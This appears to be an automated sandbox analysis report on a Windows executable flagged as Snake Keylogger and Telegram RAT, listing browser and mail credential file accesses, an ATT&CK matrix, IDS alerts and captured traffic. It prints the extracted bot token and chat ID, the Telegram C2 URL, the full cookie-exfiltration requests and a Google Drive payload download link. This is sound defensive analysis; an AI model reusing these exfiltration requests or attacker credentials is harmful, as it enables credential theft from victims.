Source: C:\Users\user\Desktop\Polylogy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Code function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405EC4

Source: C:\Users\user\Desktop\Polylogy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Polylogy.exe PID: 5568, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Polylogy.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: Polylogy.exe PID: 5568, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Polylogy.exe PID: 5568, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	11 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	13 File and Directory Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y", "Chat_id": "5898096617\n", "Version": "4.4"}
Source: Polylogy.exe.5568.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendMessage"}

Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D987A8 CryptUnprotectData,		4_2_38D987A8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D98EF1 CryptUnprotectData,		4_2_38D98EF1

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:52948 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:52947 -> 149.154.167.220:443

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 052DF45Dh	4_2_052DF4AC
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 052DF45Dh	4_2_052DF29B
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 052DFC19h	4_2_052DF961
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BA2D41h	4_2_38BA2A90
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BA3308h	4_2_38BA2EF0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAF329h	4_2_38BAF080
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAF781h	4_2_38BAF4D8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAEED1h	4_2_38BAEC28
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_38BA0853
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_38BA0040
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAD069h	4_2_38BACDC0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAFBD9h	4_2_38BAF930
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BA3308h	4_2_38BA2EED
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BADD71h	4_2_38BADAC8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BA3308h	4_2_38BA3236
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAD4C1h	4_2_38BAD218
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_38BA0673
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAD919h	4_2_38BAD670
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAEA79h	4_2_38BAE7D0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BA0D0Dh	4_2_38BA0B30
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BA16F8h	4_2_38BA0B30
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAE1C9h	4_2_38BADF20
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38BAE621h	4_2_38BAE378
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D99280h	4_2_38D98FB0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D97EB5h	4_2_38D97B78
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D95179h	4_2_38D94ED0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D97571h	4_2_38D972C8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9C396h	4_2_38D9C0C8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9F5C6h	4_2_38D9F2F8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D90B99h	4_2_38D908F0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D90741h	4_2_38D90498
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D96733h	4_2_38D96488
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then mov esp, ebp	4_2_38D9B081
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9E386h	4_2_38D9E0B8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D92151h	4_2_38D91EA8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D91CF9h	4_2_38D91A50
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D902E9h	4_2_38D90040
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D94D21h	4_2_38D94A78
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9D146h	4_2_38D9CE78
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D97119h	4_2_38D96E70
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9F136h	4_2_38D9EE68
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D93709h	4_2_38D93460
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D96CC1h	4_2_38D96A18
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D932B1h	4_2_38D93008
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9BF06h	4_2_38D9BC38
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D962D9h	4_2_38D96030
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9DEF6h	4_2_38D9DC28
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D948C9h	4_2_38D94620
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9ECA6h	4_2_38D9E9D8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D95E81h	4_2_38D95BD8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D918A1h	4_2_38D915F8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9CCB6h	4_2_38D9C9E8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9DA66h	4_2_38D9D798
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9FA56h	4_2_38D9F788
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D95A29h	4_2_38D95780
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D92E59h	4_2_38D92BB0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9BA76h	4_2_38D9B7A8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D91449h	4_2_38D911A0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D92A01h	4_2_38D92758
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9C826h	4_2_38D9C558
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D90FF1h	4_2_38D90D48
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9E816h	4_2_38D9E548
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9B5E6h	4_2_38D9B318
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D9D5D6h	4_2_38D9D308
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D925A9h	4_2_38D92300
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D955D1h	4_2_38D95328
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38D979C9h	4_2_38D97720
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E06347h	4_2_38E05FD8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E06970h	4_2_38E06678
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0CDD8h	4_2_38E0CAE0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E042B6h	4_2_38E03FE8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0F8E0h	4_2_38E0F5E8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E010BEh	4_2_38E00DF0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E08AE8h	4_2_38E087F0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E022C6h	4_2_38E01FF8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0B5F0h	4_2_38E0B2F8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0BAB8h	4_2_38E0B7C0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E03996h	4_2_38E036C8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0E5C0h	4_2_38E0E2C8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0079Eh	4_2_38E004D0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E077C8h	4_2_38E074D0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0A2D0h	4_2_38E09FD8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E01E47h	4_2_38E01BA0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0A798h	4_2_38E0A4A0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E03076h	4_2_38E02DA8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0D2A0h	4_2_38E0CFA8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0FDA8h	4_2_38E0FAB0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E05986h	4_2_38E056B8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E08FB0h	4_2_38E08CB8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0154Eh	4_2_38E01280
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E09478h	4_2_38E09180
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E02756h	4_2_38E02488
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0BF80h	4_2_38E0BC88
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0EA88h	4_2_38E0E790
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E05066h	4_2_38E04D98
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E07C90h	4_2_38E07998
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E00C2Eh	4_2_38E00960
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E08158h	4_2_38E07E60
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0AC60h	4_2_38E0A968
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0D768h	4_2_38E0D470
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E04746h	4_2_38E04478
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0030Eh	4_2_38E00040
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E06E38h	4_2_38E06B40
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E05E16h	4_2_38E05B48
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E09940h	4_2_38E09648
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0C448h	4_2_38E0C150
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E03E26h	4_2_38E03B58
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0EF50h	4_2_38E0EC58
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0F418h	4_2_38E0F120
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E054F6h	4_2_38E05228
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E08620h	4_2_38E08328
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0B128h	4_2_38E0AE30
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E03506h	4_2_38E03238
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0DC30h	4_2_38E0D938
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0E0F8h	4_2_38E0DE00
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E04BD7h	4_2_38E04908
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E07300h	4_2_38E07008
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E019DEh	4_2_38E01710
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E09E08h	4_2_38E09B10
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E02BE6h	4_2_38E02918
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E0C910h	4_2_38E0C618
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E31FE8h	4_2_38E31CF0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E31190h	4_2_38E30E98
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E30338h	4_2_38E30040
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E31B20h	4_2_38E31828
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E30CC8h	4_2_38E309D0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E31658h	4_2_38E31360
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then jmp 38E30801h	4_2_38E30508
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_38F94118
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_38F90BC0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_38F90B32
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_38F90C78
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_38F90F8E
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_38F940C7
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_38F940B9

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2018/02/2025%20/%2020:20:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendDocument?chat_id=5898096617%0A&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50c1797da015Host: api.telegram.orgContent-Length: 1279

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:52933 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:52930 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:52932 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:52928 -> 142.250.185.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:52934 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:52942 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
